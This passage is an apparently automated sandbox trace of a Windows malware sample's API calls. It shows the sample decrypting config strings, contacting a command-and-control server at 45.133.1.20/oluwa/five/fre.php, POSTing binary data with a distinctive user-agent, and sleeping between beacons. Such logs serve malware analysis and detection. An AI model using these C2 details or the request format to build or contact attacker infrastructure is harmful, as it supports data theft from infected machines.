dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0221.559] GetProcessHeap () returned 0x6a0000 [0221.559] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0221.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.560] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0221.561] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.574] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0221.575] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.575] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0221.575] GetProcessHeap () returned 0x6a0000 [0221.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0221.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.578] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0221.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.579] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0221.580] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.580] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0221.580] GetProcessHeap () returned 0x6a0000 [0221.580] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0221.581] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.582] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0221.582] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.583] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0221.584] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.584] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0221.585] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.585] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0221.585] GetProcessHeap () returned 0x6a0000 [0221.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0221.585] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0221.586] GetProcessHeap () returned 0x6a0000 [0221.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0221.587] GetProcessHeap () returned 0x6a0000 [0221.587] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0221.588] GetProcessHeap () returned 0x6a0000 [0221.588] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0221.589] GetProcessHeap () returned 0x6a0000 [0221.589] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0221.589] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.590] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0221.596] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.597] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0221.605] GetProcessHeap () returned 0x6a0000 [0221.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0221.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.606] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0221.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.607] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0221.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.609] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0221.609] GetProcessHeap () returned 0x6a0000 [0221.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0221.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.610] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0221.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.612] CryptDestroyKey (hKey=0x6ad020) returned 1 [0221.616] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.616] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0221.617] GetProcessHeap () returned 0x6a0000 [0221.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0221.617] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.618] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0221.619] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.619] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0221.620] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.621] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0221.621] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.622] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0221.622] GetProcessHeap () returned 0x6a0000 [0221.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0221.622] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0221.622] GetProcessHeap () returned 0x6a0000 [0221.622] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa30 [0221.622] socket (af=2, type=1, protocol=6) returned 0x66c [0221.622] connect (s=0x66c, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0221.648] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0221.648] GetProcessHeap () returned 0x6a0000 [0221.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0221.649] GetProcessHeap () returned 0x6a0000 [0221.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9718 [0221.650] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0221.651] wvsprintfA (in: param_1=0x6d9718, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0221.655] GetProcessHeap () returned 0x6a0000 [0221.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0221.655] GetProcessHeap () returned 0x6a0000 [0221.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 [0221.656] GetProcessHeap () returned 0x6a0000 [0221.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0221.656] GetProcessHeap () returned 0x6a0000 [0221.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9718 [0221.657] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0221.658] wvsprintfA (in: param_1=0x6d9718, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0221.658] GetProcessHeap () returned 0x6a0000 [0221.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0221.658] GetProcessHeap () returned 0x6a0000 [0221.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 [0221.659] send (s=0x66c, buf=0x6b5c98*, len=242, flags=0) returned 242 [0221.660] send (s=0x66c, buf=0x6bb998*, len=159, flags=0) returned 159 [0221.660] GetProcessHeap () returned 0x6a0000 [0221.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c5718 [0221.660] recv (in: s=0x66c, buf=0x6c5718, len=4048, flags=0 | out: buf=0x6c5718*) returned 204 [0221.737] GetProcessHeap () returned 0x6a0000 [0221.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0221.738] GetProcessHeap () returned 0x6a0000 [0221.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0221.738] GetProcessHeap () returned 0x6a0000 [0221.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0221.739] GetProcessHeap () returned 0x6a0000 [0221.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0221.739] closesocket (s=0x66c) returned 0 [0221.740] GetProcessHeap () returned 0x6a0000 [0221.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa30 | out: hHeap=0x6a0000) returned 1 [0221.740] GetProcessHeap () returned 0x6a0000 [0221.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0221.741] GetProcessHeap () returned 0x6a0000 [0221.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0221.741] GetProcessHeap () returned 0x6a0000 [0221.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0221.742] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c5718, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x8d8) returned 0x66c [0221.744] Sleep (dwMilliseconds=0xea60) [0221.745] GetProcessHeap () returned 0x6a0000 [0221.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0221.746] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.746] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0221.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.759] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bec18) returned 1 [0221.789] GetProcessHeap () returned 0x6a0000 [0221.789] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b6a28 [0221.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.790] CryptImportKey (in: hProv=0x6bec18, pbData=0x6b6a28, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0221.791] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.792] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0221.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.793] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0221.793] GetProcessHeap () returned 0x6a0000 [0221.794] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6a28 | out: hHeap=0x6a0000) returned 1 [0221.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.805] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0221.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.822] CryptDestroyKey (hKey=0x6ad020) returned 1 [0221.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.824] CryptReleaseContext (hProv=0x6bec18, dwFlags=0x0) returned 1 [0221.824] GetProcessHeap () returned 0x6a0000 [0221.824] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0221.824] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.825] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0221.826] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.826] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0221.827] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.828] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0221.831] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.832] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0221.832] GetProcessHeap () returned 0x6a0000 [0221.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0221.832] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0221.832] GetProcessHeap () returned 0x6a0000 [0221.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0221.833] GetProcessHeap () returned 0x6a0000 [0221.833] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0221.834] GetProcessHeap () returned 0x6a0000 [0221.834] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0221.834] GetProcessHeap () returned 0x6a0000 [0221.834] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0221.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.835] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0221.845] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.845] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0221.854] GetProcessHeap () returned 0x6a0000 [0221.854] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0221.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.855] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0221.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.856] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0221.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.857] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0221.857] GetProcessHeap () returned 0x6a0000 [0221.857] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0221.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.858] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0221.859] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.859] CryptDestroyKey (hKey=0x6ad020) returned 1 [0221.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.860] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0221.860] GetProcessHeap () returned 0x6a0000 [0221.860] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0221.861] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.862] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0221.863] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.863] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0221.864] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.864] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0221.865] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0221.865] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0221.865] GetProcessHeap () returned 0x6a0000 [0221.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0221.865] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0221.865] GetProcessHeap () returned 0x6a0000 [0221.865] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0221.865] socket (af=2, type=1, protocol=6) returned 0x670 [0221.866] connect (s=0x670, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0221.892] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0221.892] GetProcessHeap () returned 0x6a0000 [0221.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0221.892] GetProcessHeap () returned 0x6a0000 [0221.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6d9718 [0221.893] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0221.894] wvsprintfA (in: param_1=0x6d9718, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0221.894] GetProcessHeap () returned 0x6a0000 [0221.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bd460 [0221.894] GetProcessHeap () returned 0x6a0000 [0221.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 [0221.894] GetProcessHeap () returned 0x6a0000 [0221.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0221.896] GetProcessHeap () returned 0x6a0000 [0221.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9718 [0221.897] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0221.898] wvsprintfA (in: param_1=0x6d9718, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0221.898] GetProcessHeap () returned 0x6a0000 [0221.898] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0221.898] GetProcessHeap () returned 0x6a0000 [0221.899] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 [0221.899] send (s=0x670, buf=0x6b5c98*, len=242, flags=0) returned 242 [0221.900] send (s=0x670, buf=0x6bb998*, len=159, flags=0) returned 159 [0221.900] GetProcessHeap () returned 0x6a0000 [0221.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c5718 [0221.900] recv (in: s=0x670, buf=0x6c5718, len=4048, flags=0 | out: buf=0x6c5718*) returned 204 [0221.979] GetProcessHeap () returned 0x6a0000 [0221.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0221.980] GetProcessHeap () returned 0x6a0000 [0221.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0221.980] GetProcessHeap () returned 0x6a0000 [0221.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0221.980] GetProcessHeap () returned 0x6a0000 [0221.981] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0221.981] closesocket (s=0x670) returned 0 [0221.982] GetProcessHeap () returned 0x6a0000 [0221.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0221.982] GetProcessHeap () returned 0x6a0000 [0221.982] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0221.982] GetProcessHeap () returned 0x6a0000 [0221.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0221.983] GetProcessHeap () returned 0x6a0000 [0221.983] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0221.983] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c5718, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x92c) returned 0x670 [0221.985] Sleep (dwMilliseconds=0xea60) [0221.987] GetProcessHeap () returned 0x6a0000 [0221.987] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0221.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.988] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0221.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0221.999] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0222.008] GetProcessHeap () returned 0x6a0000 [0222.008] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0222.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.010] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0222.010] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.011] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0222.011] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0222.012] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0222.012] GetProcessHeap () returned 0x6a0000 [0222.012] HeapFree (in: hHeap=0x6a0000, 